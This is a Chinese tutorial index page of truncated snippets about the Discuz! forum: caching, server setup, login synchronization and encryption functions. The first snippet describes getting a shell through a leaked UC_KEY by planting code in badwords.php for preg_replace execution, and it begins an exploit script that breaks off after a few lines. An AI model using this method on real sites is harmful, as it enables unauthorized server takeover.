DISCUZ - 技术教程文章
Discuz利用UC_KEY进行前台getshell【代码】【图】
来源:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0137991.html先通过uc_key把恶意代码保存在/uc_client/data/cache/badwords.php,然后利用preg_replace() 进行任意代码执行。先附上来源中的脚本。修改了一些代码。<?php $timestamp = time()+10*3600; $host="ip地址"; $agent= md5("Mozilla/5.0 (Windows NT 6.1; rv:27.0) Gecko/20100101 Firefox/27.0"); $uc_key="网站的uc_key"; $code=urlencode(_authcode("agent=$a...
Discuz 3.X 门户文章插入图片自动添加 alt 标签【代码】
最近用 Discuz 搭建了个网站——儿童安全座椅网(www.bbseat.com.cn),用到了门户功能,不得不说Discuz 的功能还是非常强大的,但在使用过程中发现在发表文章时添加了图片却不能像 WordPress 这样自动添加 alt 标签,经过一番研究,初步解决了这个问题,目前还没有 Bug,等待长时间验证,方法如下:在实施本方法之前请先备份网站数据,以防不测;这次修改需要修改两个文件,分别是:static/image/editor/editor_function.js templ...
在Discuz!NT中进行缓存分层(本地缓存+memcached)(转)【图】
在以前的两篇文章(Discuz!NT 缓存设计简析, Discuz!NT中集成Memcached分布式缓存)中,介绍了Discuz!NT中的缓存设计思路以及如何引入Memcached,当然前者是IIS进程的缓存(本地缓存),后者是分布式内存对象缓存系统。 两者通过Discuz!NT中的memcached.config文件中的ApplyMemCached结点的值来决定使用哪一种缓存方式。不过在之后,有朋友反映当使用Memcached时,特别是在大并发来时,效率会打折扣,甚至有很多时间会消耗在soc...
源码安装LAMP+Discuz【图】
Apache 安装步骤:说明:操作系统CentOS release 6.5 (Final)内核版本:2.6.32-431.el6.x86_641,准备的软件:apr-1.5.2.tar.gz、apr-util-1.5.4.tar.gz、httpd-2.4.18.tar.gz、mysql-5.5.32.tar.gz、pcre-8.38.tar.gz、php-5.6.20.tar.gz [root@glpi /]#yum -y install gcc gcc-c++ make ncurses ncurses-devel libaio-devel cmake libxml2-devel2,安装APACHE步骤:2.1.1)新建文件安装目录/application所有的安装程序都安装...
haproxy实现discuz论坛的动静分离和负载均衡_html/css_WEB-ITnose
一、在cs2、cs3、cs4上安装httpd [root@cs2 ~]# yum install httpd[root@cs3 ~]# yum install httpd[root@cs4 ~]# yum install httpd 二、在cs3、cs4上安装php和php-mysql [root@cs3 ~]# yum install php[root@cs3 ~]# yum install php-mysql[root@cs4 ~]# yum install php[root@cs4 ~]# yum install php-mysql 三、在cs5上安装mysql [root@cs5 ~]# yum install mariadb-server 四、在cs5上给dz论坛创建数据库 ...
Discuz!下Memcache缓存实现方法_PHP教程
前言:在PHP+MySQL架构的站点中,本文重点从MySQL的角度去分析如何使Discuz!论坛(或者类似的PHP+MySQL架构的程序)应对大访问量。同时给出一些使用Memcache去减轻MySQL压力的建议。其中很多数据是个人测试的结果,如有不同意见,敬请留言告之。另外由于个人思维的问题,行文比较跳跃,特此声明! 系统分析:单纯的从MySQL的角度出发,单台MySQL的数据库负载到每天上亿次的操作(每秒大概1100次MySQL操作,然后乘以86400)应该不是...
Discuz!下Memcache缓存实现方法_php技巧
前言:在PHP+MySQL架构的站点中,本文重点从MySQL的角度去分析如何使Discuz!论坛(或者类似的PHP+MySQL架构的程序)应对大访问量。同时给出一些使用Memcache去减轻MySQL压力的建议。其中很多数据是个人测试的结果,如有不同意见,敬请留言告之。另外由于个人思维的问题,行文比较跳跃,特此声明! 系统分析:单纯的从MySQL的角度出发,单台MySQL的数据库负载到每天上亿次的操作(每秒大概1100次MySQL操作,然后乘以86400)应该不是...
Discuz!下Memcache缓存实现方法
前言:在PHP+MySQL架构的站点中,本文重点从MySQL的角度去分析如何使Discuz!论坛(或者类似的PHP+MySQL架构的程序)应对大访问量。同时给出一些使用Memcache去减轻MySQL压力的建议。其中很多数据是个人测试的结果,如有不同意见,敬请留言告之。另外由于个人思维的问题,行文比较跳跃,特此声明! 系统分析:单纯的从MySQL的角度出发,单台MySQL的数据库负载到每天上亿次的操作(每秒大概1100次MySQL操作,然后乘以86400)应该不是...
discuz中使用memcache缓存步骤
discuz可以使用多种缓存,这里只说数据缓存。discuz支持redis、memcache等缓存方式,只要在/config/config_global.php里设置一下,并且环境支持就可以使用了。其实读写缓存还是比较简单的,代码如下:require_once libfile(function/cache); //加载缓存类 savecache($cachename, $data); //写缓存 loadcache($cachename); //读缓存,将缓存写到$_G变量中,通过读取$_G[cache]来获取缓存数据。其中savecache()将数据写到设置的缓存...
在discuz里使用数据缓存
捣鼓了几天discuz的缓存,弄出了些头绪,效率真低,2333333~~~~discuz可以使用多种缓存,这里只说数据缓存。discuz支持redis、memcache等缓存方式,只要在/config/config_global.php里设置一下,并且环境支持就可以使用了。其实读写缓存还是比较简单的,代码如下:require_once libfile(function/cache); //加载缓存类savecache($cachename, $data); //写缓存loadcache(plugin_fahao_kflist); //读缓存,将缓存写到$_G变量中,通过...
discuzauthcode经典php加密解密函数解析_php技巧
原理如下,假如: 加密 明文:1010 1001 密匙:1110 0011 密文:0100 1010 得出密文0100 1010,解密之需和密匙异或下就可以了 解密 密文:0100 1010 密匙:1110 0011 明文:1010 1001 并没有什么高深的算法,密匙重要性很高,所以,关键在于怎么生成密匙。 那我们一起看下康盛的authcode怎么做的吧 代码如下:// 参数解释 // $string: 明文 或 密文 // $operation:DECODE表示解密,其它表示加密 // $key: 密匙 // $expiry:密文有...
关于DISCUZ不用通行证登陆得内容介绍第1/2页_php实例
关于DISCUZ不用通行证登陆得内容介绍 DISCUZ是中国最常用的论坛,虽然他本身有通行证给大家连接,但实际上用户的统一还是很不好,经常要建立两个用户表,第一不利于注册和管理,第二浪费数据库。 最近做一个项目也是使用的DISCUZ,所以研究了一下DISCUZ的登陆,基本完成了同步登陆。大家如果有兴趣可以研究一下。 别的不废话了,如果你自己写的系统,可以直接用DISCUZ的公用文件,直接引用include/common.inc.php就好了,这样最简单...
解决Discuz!info:MySQLQueryError
**********解决办法: 在浏览器中输入localhost/discuz7/bbs/install会进入安装的界面继续安装向导。 以下为错误: php下安装Discuz!完成后点进bbs报错: Discuz! info : MySQL Query Error Time : 2014-11-6 8:23am Script : /discuz7/bbs/index.php SQL : **********解决办法:在浏览器中输入localhost/discuz7/bbs/install会进入安装的界面继续安装向导。以下为错误: php下安装Discuz!完成后点进bbs报错:Discuz! info: MySQ...
Discuz Uchome ajaxpost小技巧
比如默认submit按钮这样操作:onclick="ajaxpost('formid')";之类的,我们可以先这样。。 onclick="$('__formid').innerText='';ajaxpost('formid');checkPostResult();"; 含义其实很简单,先把ajaxpost提示信息所在的div内容清空。然后提交。最后,根据返回值来判断。。 代码如下:function checkPostResult(){ var cid = setInterval(function(){ if( $(__formid).innerText == success){ alert(提交成功); location.href=xxxxx....
%s%t%f%i%s%d%n在discuz数据调取时该怎么用
discuz中有很多这样的符号,我的理解是他们是替代符号,这些符号好象是为了方便书写. 另外discuz sql语句中有很多的参数,官方也没有给一个明确的说法,当然了源码我也只能看个半懂. 比如有时此类句子中,后面还跟一个array( );括号内还放了一些参数,不知这些参数是代表啥哟 回复讨论(解决方案) 您太节俭了 至少要把你看到的贴出来吧? http://faq.comsenz.com/library/plug/construct/construct_db.htm 有文档,只...
千万级记录的Discuz论坛导致MySQLCPU100%的优化笔记
谈到自己在解决一个拥有 60 万条记录的 MySQL 数据库访问时,导致 MySQL CPU 占用 100% 的经过。在解决问题完成优化(optimize)之后,我发现 Discuz 论坛也存在这个问题,当时稍微提了一下发现此主机运行了几个 Discuz 的论坛程序, Discuz论坛的好几个表也存在着这个问题。于是顺手一并解决,cpu占用再次降下来了。 前几天,一位朋友通过这篇文章找到了我,说他就是运行最新的 discuz 版本,MySQL 占用 CPU 100%,导致系统假死...
discuz插件开发的数据安全问题
初学者,请教各位高手: 我想做一个数据库查询的discuz论坛插件,但是想做到对数据库中的数据进行保护,比如用户只能通过插件才能看到数据,而无法抓取数据,有什么简单的实现方案吗? php我不是太了解, 是否可以通过php调用C#或c的Dll实现? 对这方面大家有什么建议? 请详细说说, 非常感谢! 回复讨论(解决方案) 建议还是先了解下 Discuz 插件开发的 ABC,推荐一下我自己写的教程: http://www.bacysoft.cn/thread-113-...
discuz7 phpMysql操作类
代码如下:<?php /* * MySql数据库连接类 * mysql.class.php 2009.04.15 by Hackbaby */ class dbstuff { var $version = ; var $querynum = 0; var $link = null; //连接数据库 function connect($dbhost, $dbuser, $dbpw, $dbname, $pconnect = 0, $halt = TRUE, $dbcharset2 = ) { $conn = empty($pconnect) ? mysql_connect : mysql_pconnect; if (!$this->link = @$conn($dbhost, $dbuser, $dbpw, 1)) { $halt && $this->halt(...
哪位高手能说明一下discuzX2.5upload/index.php文件思路!
discuz discuz X2.5 upload/index.php代码如下,主说针对运行步骤(架构思路)说明一下,越详细越好,非常感谢!!! 'space', 'uid'=>$_SERVER['QUERY_STRING']);} else { $url = ''; $domain = $_ENV = array(); $jump = false; @include_once './data/sysdata/cache_domain.php'; $_ENV['domain'] = $domain; if(empty($_ENV['domain'])) { $_ENV['curapp'] = 'forum'; } else { $_ENV['defaultapp'] = array('portal.ph...
关于DISCUZ不用通行证登陆得内容介绍第1/2页_PHP教程
关于DISCUZ不用通行证登陆得内容介绍 DISCUZ是中国最常用的论坛,虽然他本身有通行证给大家连接,但实际上用户的统一还是很不好,经常要建立两个用户表,第一不利于注册和管理,第二浪费数据库。 最近做一个项目也是使用的DISCUZ,所以研究了一下DISCUZ的登陆,基本完成了同步登陆。大家如果有兴趣可以研究一下。 别的不废话了,如果你自己写的系统,可以直接用DISCUZ的公用文件,直接引用include/common.inc.php就好了,这样最简单...
(转)对帝国cms、dedecms、phpcms、discuz、phpwind、xiuno负荷测试总结
(转)对帝国cms、dedecms、phpcms、discuz、phpwind、xiuno负载测试总结 担心被骂,本不想写这篇文章。犹豫良久,最终还是决定写。希望能够帮助到一些朋友,认识到数据库索引正确设计的重要性。由于我比较懒,就简单用文字描述一下,就懒得切图片证明了,懂技术的朋友可以自己测试一下,可证实我的测试结果是否真实。不懂技术的朋友信不信也无妨。测试程序:CMS程序:帝国cms dedecms phpcms论坛程序:discuz phpwind xiuno负载测...
使用Discuz关键词服务器实现PHP中文分词_PHP教程
不同于使用自己的服务器进行分词,Discuz!在线中文分词服务是基于API返回分词结果的。在项目中,我们只需要一个函数即可方便地进行分词、关键词提取。以下是根据Discuz!在线分词服务API写的函数,测试可正常运行: 代码如下:/** * DZ在线中文分词 * @param $title string 进行分词的标题 * @param $content string 进行分词的内容 * @param $encode string API返回的数据编码 * @return array 得到的关键词数组 */ function dz_se...
从零开始教你如何搭建Discuz!4.1论坛(图)_PHP教程
随着网络的发展越来越多的网友开始学习建立自己的网站,通过网站将自己的资料提供给其他人,并且通过论坛与其他朋友讨论问题,发表见解。各大网站也纷纷建立起自己的论坛来吸引众多网友。很多人都希望能够学会建立论坛的方法,今天就由我来为大家介绍如何建立论坛这方面的内容。 像我们这些普通使用者是不可能自己编写整个PHP论坛的,最好的办法就是拿别人的现成论坛实现自己搭建论坛的目的。网络上有很多使用PHP语言建立的论坛蓝...
从康盛产品(discuz)提取出来的模板类_PHP教程
代码如下:/*template.class.php @康盛微博 模板提取类 觉得这个模板好用 花些时间独立出来。 by 雷日锦 @看了一下ctt 这个模板 跟 phpcms的模板类似 难道?? ^_^ 嘿嘿!!! @ 微博 http://weibo.com/lrjxgl @ 好东西大家共享 磕磕绊绊的提取出来 有问题请提出来 @ 模板文件默认为 .htm $tpl = new template('skin',"default"); $tpl->objdir='tpp'; $tpl->rewrite=true;//开启rewrite 需要服务器支持 $tpl->rewrite_rule=array(a...
求discuz高手解惑
我想找到上广告的源文件,我在模板里找到了广告位是: 但是我怎么找也找不到这个广告的愿为文件在什么地方,或者说这个广告位生成的文件在什么地方,求高手解惑 回复讨论(解决方案) 你把模板里的广告位删掉就没有了,还出来,那就是别的js文件里生成的,是你的广告吗,不是被挂马了吧~ 我是想把源文件找出来,同步到别的服务器上,不是找不到广告 广告都在 class/adv 文件夹里面
discuz的数据库调用机制到底是怎么回事【图】
给100分 最近研究discuz,看到官方包中很多htm模板中没有调用数据库的语句,几乎清一色的全是loop循环,这我就有点不明白了, 在调用前没有sql语句出现,循环什么呢? 但是事实正好相反,它是能调出来的,所以不明白它的调用机制是怎么回事! 为了更好的说明举一个例子吧! 比如下面这个loop循环: 0} $trade[price] 0} 0}{lang additional} $trade[credit] {$_G[setting][ex...
DiscuzNT 论坛与主站的同步登录与退出
论坛域名是:forum.web.net(虚拟) 网站域名是:www.web.net(虚拟too) 先用管理员帐户进入论坛后台在基本设置中,将“身份验证Cookie域:”设置为.web.net 论坛配置好后,复制bin文件夹的 Discuz.Forum.dll,Discuz.Entity.dll,Discuz.Data.dll,Discuz.Data.SqlServer.dll 和Discuz.Common.dll到网站的bin下。同样,DNT.Config也放到网站根目录 贴个代码看,更清楚些。 代码如下:using System; using System.Collections; using Syst...
Discuz论坛密码与密保加密规则
Discuz密码加密规则:md5(md5(字符串).固定字串); 固定字符串是在注册用户的时候随机生成的,且保存在数据表pre_ucenter_members的salt字段中。 举例:假如密码为 123456789 ,固定字符串为jb51, 那么加密规则为:md5(md5(123456789).jb51); 得出的结果就是:96122ff0dd306c912aab15adccf21df1Discuz密保加密规则: 加密过程是value的值先加密一次,比如我的提问是“驾驶执照的最后四位数字”value的值就是...
discuz论坛用户登录后台程序代码_PHP教程
还好,用户登录这里通过一个小小的方法可以实现和论坛同步了.可以不用passport接口. 这是我整理的数据,仅供参考. 登录传两值过来就行(username和password); 代码如下:<?php session_start(); define(NOROBOT, TRUE); define(CURSCRIPT, logging); require_once ./include/common.inc.php; require_once DISCUZ_ROOT../include/misc.func.php; if($action == login) { $field = $loginfield == uid ? uid : username; //get...
Discuz!5的PHP代码高亮显示插件(黑暗中的舞者更新)
discuz!5.0论坛显示风格的php代码高亮显示插件, 把php代码进行语法着色,喜欢PHP的同志可以轻松的看代码啦。 同时添加了html代码运行功能。 此插件是在以前某位同志发布的Discuz!4的php代码高亮显示基础之上修改完成。 另外,本人的php学习进入了停滞状态, 希望有人能帮助我走出php的学习困境 My QQ:5642382 我的QQ群:2577162 功能:发贴时使用[php]php代码[/php]标记来高亮显示php代码, 使用[runcode]Html代码[/runcode]...